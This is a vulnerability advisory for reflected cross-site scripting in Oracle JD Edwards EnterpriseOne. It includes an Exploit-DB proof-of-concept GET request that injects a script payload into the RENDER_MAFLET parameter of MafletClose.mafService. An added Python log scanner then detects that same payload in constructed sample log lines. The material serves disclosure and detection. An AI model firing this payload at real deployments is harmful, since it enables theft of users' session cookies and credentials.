Vendor: JD Edwards EnterpriseOne
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: JD Edwards EnterpriseOne
Affected Version From: 8.9 GA
Affected Version To: 8.98.4.1 and OneWorld Tools through 24.1.3
Patch Exists: NO
Related CWE:
CPE: a:oracle:jd_edwards_enterpriseone
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Cross-Site Scripting Vulnerabilities in Oracle JD Edwards EnterpriseOne

An attacker can execute arbitrary script code in the browser of an unsuspecting user by leveraging the cross-site scripting vulnerabilities in Oracle JD Edwards EnterpriseOne. This can lead to the theft of authentication credentials and other attacks.

Mitigation:

Apply the latest patches and updates provided by Oracle.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3

http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService

Parameter: RENDER_MAFLET

* The GET request has been set to: E1Menu"%2Balert%2844218%29%2B"

/jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
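Added defensive example, not part of the advisory or the Exploit-DB record: a small Python scanner that reads web-server access-log lines in Common Log Format and flags requests to the MafletClose.mafService endpoint whose RENDER_MAFLET value is not a plain identifier such as the legitimate E1Menu shown above. The endpoint, parameter name and payload come from the record; the log format, client addresses and timestamps in the sample lines are constructed for the example and are not real traffic.

```python
"""Detect anomalous RENDER_MAFLET values in JD Edwards access logs.

Added example (not from the advisory). Assumes Common Log Format lines
and that legitimate maflet names are simple identifiers like E1Menu.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Legitimate maflet names on the page are plain identifiers (e.g. E1Menu);
# quotes, parentheses and operators have no business in this parameter.
SAFE_MAFLET = re.compile(r"^[A-Za-z0-9_]+$")

# Endpoint taken from the record above.
TARGET_PATH = "/jde/MafletClose.mafService"

# Constructed sample log lines (Common Log Format); not real traffic.
# Line 2 carries the record's payload with the quotes percent-encoded,
# which is how a client would normally send it.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Apr/2011:10:00:01 +0000] "GET /jde/MafletClose.mafService?e1.mode=view&RENDER_MAFLET=E1Menu&e1.service=MafletClose HTTP/1.0" 200 512
10.0.0.9 - - [20/Apr/2011:10:00:07 +0000] "GET /jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu%22%2Balert%2844218%29%2B%22&e1.service=MafletClose HTTP/1.0" 200 640
10.0.0.9 - - [20/Apr/2011:10:00:09 +0000] "GET /jde/E1Menu.maf?selectJPD812=*ALL HTTP/1.0" 200 2048
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def parse_clf(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = CLF.match(line)
    return m.groupdict() if m else None


def suspicious_maflet_values(target):
    """Return decoded RENDER_MAFLET values that are not plain identifiers.

    parse_qs percent-decodes the value, so %22 and %2B become the literal
    quote and plus characters that the scanner is looking for.
    """
    query = urlsplit(target).query
    values = parse_qs(query, keep_blank_values=True).get("RENDER_MAFLET", [])
    return [v for v in values if not SAFE_MAFLET.match(v)]


def scan_log(text):
    """Scan CLF text and return one finding per request with an anomalous value."""
    findings = []
    for line in text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        if not rec["target"].startswith(TARGET_PATH):
            continue
        bad = suspicious_maflet_values(rec["target"])
        if bad:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "values": bad})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} anomalous RENDER_MAFLET: {f['values']}")
```

Run against real logs, the allow-list regex is the part to tune: build it from the maflet names actually observed in normal traffic rather than from a block-list of script keywords, since a reflected value that is not a valid maflet name is anomalous regardless of which payload it carries.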